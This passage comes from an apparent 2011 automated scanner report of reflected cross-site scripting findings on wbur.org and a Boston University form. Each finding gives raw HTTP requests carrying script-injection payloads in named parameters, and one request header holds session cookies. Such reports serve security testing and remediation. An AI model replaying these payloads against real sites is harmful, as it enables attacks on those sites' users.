User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.bu.edu/alumni-forms/forms/giving/online/index/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; credsrv3=cussp-srv4; _chartbeat2=0ox0lnwgyvmm6pyy.1317665362956; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.18.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:06:22 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d PHP/4.4.9
Set-Cookie: isMobile=false_1.2; path=/; domain=.bu.edu
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Via: 1.1 www.bu.edu
X-BU-Main-Uniqueid: ToycngrxHDYAAE-UEjgAAAJU
X-BU-Duration: D=1009666
X-BU-Backend: http://webapps-881.bu.edu:180 (null)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 59749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin templat
...[SNIP]...
<textarea name="fund_other" cols="35" rows="2" wrap="virtual">2850d<script>alert(1)</script>f93343ad016b277d2</textarea>
...[SNIP]...

1.13. http://www.wbur.org/arts-calendar/ [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /arts-calendar/

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a55c</script><script>alert(1)</script>f9140c2b31f was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /arts-calendar/?url=http://www.artsboston.org/web_services/calendar/91/event/detail/4413939902a55c</script><script>alert(1)</script>f9140c2b31f HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:48 GMT
Connection: close
Content-Length: 32347


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
pt type="text/javascript">    
                       $(document).ready(function(){
                           $("#e_widget_iframe").attr("src", "http://www.artsboston.org/web_services/calendar/91/event/detail/4413939902a55c</script><script>alert(1)</script>f9140c2b31f");
                       });
</script>
...[SNIP]...

1.14. http://www.wbur.org/content/news/arts-culture [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wbur.org
Path:   /content/news/arts-culture

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 641a1"><a>50ac5cbcf3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 641a1\"><a>50ac5cbcf3 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content/news/arts-culture?641a1"><a>50ac5cbcf3=1 HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:04 GMT
Connection: close
Content-Length: 31763

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...
<a href="/content/news/arts-culture?641a1\"><a>50ac5cbcf3=1/feed" class="sprite rsslink">
...[SNIP]...

1.15. http://www.wbur.org/content/news/boston [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wbur.org
Path:   /content/news/boston

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc4b0"><a>c774540cdcd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc4b0\"><a>c774540cdcd in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content/news/boston?bc4b0"><a>c774540cdcd=1 HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:49 GMT
Connection: close
Content-Length: 43351

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...
<a href="/content/news/boston?bc4b0\"><a>c774540cdcd=1/feed" class="sprite rsslink">
...[SNIP]...

1.16. http://www.wbur.org/content/news/economy-business [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wbur.org
Path:   /content/news/economy-business

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 408f6"><a>b26993f6b2b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 408f6\"><a>b26993f6b2b in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content/news/economy-business?408f6"><a>b26993f6b2b=1 HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:57 GMT
Connection: close
Content-Length: 31795

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...
<a href="/content/news/economy-business?408f6\"><a>b26993f6b2b=1/feed" class="sprite rsslink">
...[SNIP]...

1.17. http://www.wbur.org/content/news/health [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wbur.org
Path:   /content/news/health

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1366"><a>c70e59c3a95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1366\"><a>c70e59c3a95 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content/news/health?d1366"><a>c70e59c3a95=1 HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:01 GMT
Connection: close
Content-Length: 31714

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...
<a href="/content/news/health?d1366\"><a>c70e59c3a95=1/feed" class="sprite rsslink">
...[SNIP]...

1.18. http://www.wbur.org/content/news/nation [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wbur.org
Path:   /content/news/nation

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19279"><a>c23b544afe0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19279\"><a>c23b544afe0 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content/news/nation?19279"><a>c23b544afe0=1 HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:50 GMT
Connection: close
Content-Length: 31655

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...
<a href="/content/news/nation?19279\"><a>c23b544afe0=1/feed" class="sprite rsslink">
...[SNIP]...

1.19. http://www.wbur.org/content/news/politics [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wbur.org
Path:   /content/news/politics

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2904c"><a>43dd636b902 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2904c\"><a>43dd636b902 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content/news/politics?2904c"><a>43dd636b902=1 HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:54 GMT
Connection: close
Content-Length: 31796

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...
<a href="/content/news/politics?2904c\"><a>43dd636b902=1/feed" class="sprite rsslink">
...[SNIP]...

1.20. http://www.wbur.org/content/news/science-technology [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wbur.org
Path:   /content/news/science-technology

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e74ec"><a>f55c0c6ed99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e74ec\"><a>f55c0c6ed99 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content/news/science-technology?e74ec"><a>f55c0c6ed99=1 HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:04 GMT
Connection: close
Content-Length: 31789

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...
<a href="/content/news/science-technology?e74ec\"><a>f55c0c6ed99=1/feed" class="sprite rsslink">
...[SNIP]...

1.21. http://www.wbur.org/content/news/sports [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wbur.org
Path:   /content/news/sports

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42f80"><a>70cc3c66527 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 42f80\"><a>70cc3c66527 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content/news/sports?42f80"><a>70cc3c66527=1 HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:05 GMT
Connection: close
Content-Length: 31732

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...
<a href="/content/news/sports?42f80\"><a>70cc3c66527=1/feed" class="sprite rsslink">
...[SNIP]...

1.22. http://www.wbur.org/content/news/world [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wbur.org
Path:   /content/news/world

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc8c5"><a>6b268a3ba83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dc8c5\"><a>6b268a3ba83 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content/news/world?dc8c5"><a>6b268a3ba83=1 HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:52 GMT
Connection: close
Content-Length: 31719

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...
<a href="/content/news/world?dc8c5\"><a>6b268a3ba83=1/feed" class="sprite rsslink">
...[SNIP]...

1.23. http://www.wbur.org/email-this [link parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /email-this

Issue detail

The value of the link request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbcc4"><script>alert(1)</script>29414b4b729 was submitted in the link parameter. This input was echoed as cbcc4\"><script>alert(1)</script>29414b4b729 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /email-this?story=At+The+Democratic+Debate+For+Senate%2C+Warren+A+Standout&link=http://www.wbur.org/2011/10/05/democrats-debatecbcc4"><script>alert(1)</script>29414b4b729 HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:54 GMT
Connection: close
Content-Length: 8266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<form name="emtf_form" id="emtf_form" action="/email-this?story=At+The+Democratic+Debate+For+Senate%2C+Warren+A+Standout&link=http://www.wbur.org/2011/10/05/democrats-debatecbcc4\"><script>alert(1)</script>29414b4b729" method="post">
...[SNIP]...

1.24. http://www.wbur.org/email-this [link parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /email-this

Issue detail

The value of the link request parameter is copied into the HTML document as plain text between tags. The payload 53a60<script>alert(1)</script>c5c39e58b2e was submitted in the link parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /email-this?story=At+The+Democratic+Debate+For+Senate%2C+Warren+A+Standout&link=http://www.wbur.org/2011/10/05/democrats-debate53a60<script>alert(1)</script>c5c39e58b2e HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:55 GMT
Connection: close
Content-Length: 8257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<div class="preview-link">http://www.wbur.org/2011/10/05/democrats-debate53a60<script>alert(1)</script>c5c39e58b2e</div>
...[SNIP]...

1.25. http://www.wbur.org/email-this [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /email-this

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bfd1"><script>alert(1)</script>983aafa6e69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8bfd1\"><script>alert(1)</script>983aafa6e69 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /email-this?8bfd1"><script>alert(1)</script>983aafa6e69=1 HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:49 GMT
Connection: close
Content-Length: 7809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<form name="emtf_form" id="emtf_form" action="/email-this?8bfd1\"><script>alert(1)</script>983aafa6e69=1" method="post">
...[SNIP]...

1.26. http://www.wbur.org/email-this [story parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /email-this

Issue detail

The value of the story request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d14db"><script>alert(1)</script>02c36fdc201 was submitted in the story parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /email-this?story=At+The+Democratic+Debate+For+Senate%2C+Warren+A+Standoutd14db"><script>alert(1)</script>02c36fdc201&link=http://www.wbur.org/2011/10/05/democrats-debate HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:52 GMT
Connection: close
Content-Length: 8307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<input type="hidden" name="st" value="At The Democratic Debate For Senate, Warren A Standoutd14db"><script>alert(1)</script>02c36fdc201" />
...[SNIP]...

1.27. http://www.wbur.org/email-this [story parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /email-this

Issue detail

The value of the story request parameter is copied into the HTML document as text between TITLE tags. The payload 8a337</title><script>alert(1)</script>901985cc373 was submitted in the story parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /email-this?story=At+The+Democratic+Debate+For+Senate%2C+Warren+A+Standout8a337</title><script>alert(1)</script>901985cc373&link=http://www.wbur.org/2011/10/05/democrats-debate HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:54 GMT
Connection: close
Content-Length: 8330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<title>At The Democratic Debate For Senate, Warren A Standout8a337</title><script>alert(1)</script>901985cc373 | WBUR</title>
...[SNIP]...

1.28. http://www.wbur.org/email-this [story parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /email-this

Issue detail

The value of the story request parameter is copied into the HTML document as plain text between tags. The payload 8984f<script>alert(1)</script>171af24e126 was submitted in the story parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /email-this?story=At+The+Democratic+Debate+For+Senate%2C+Warren+A+Standout8984f<script>alert(1)</script>171af24e126&link=http://www.wbur.org/2011/10/05/democrats-debate HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:52 GMT
Connection: close
Content-Length: 8298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<div class="preview-title">At The Democratic Debate For Senate, Warren A Standout8984f<script>alert(1)</script>171af24e126</div>
...[SNIP]...

1.29. http://www.wbur.org/media-player [title parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /media-player

Issue detail

The value of the title request parameter is copied into the HTML document as plain text between tags. The payload f49cb<script>alert(1)</script>7779a85574d was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media-player?title=livef49cb<script>alert(1)</script>7779a85574d HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:32 GMT
Connection: close
Content-Length: 12998


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head
...[SNIP]...
<a href="">livef49cb<script>alert(1)</script>7779a85574d</a>
...[SNIP]...

1.30. http://www.wbur.org/media-player [title parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /media-player

Issue detail

The value of the title request parameter is copied into the HTML document as text between TITLE tags. The payload 92fab</title><script>alert(1)</script>aef5d1e0dbb was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media-player?title=live92fab</title><script>alert(1)</script>aef5d1e0dbb HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:33 GMT
Connection: close
Content-Length: 13014


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head
...[SNIP]...
<title>live92fab</title><script>alert(1)</script>aef5d1e0dbb | WBUR</title>
...[SNIP]...

1.31. http://www.wbur.org/media-player [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /media-player

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 903d1"><script>alert(1)</script>a76406f8e7e was submitted in the url parameter. This input was echoed as 903d1\"><script>alert(1)</script>a76406f8e7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media-player?url=http://www.wbur.org/2011/10/05/democrats-debate903d1"><script>alert(1)</script>a76406f8e7e&title=At+The+Democratic+Debate+For+Senate%2C+Warren+A+Standout&segment=democrats-debate&pubdate=2011-10-05&type= HTTP/1.1
Host: www.wbur.org
Accept: */*
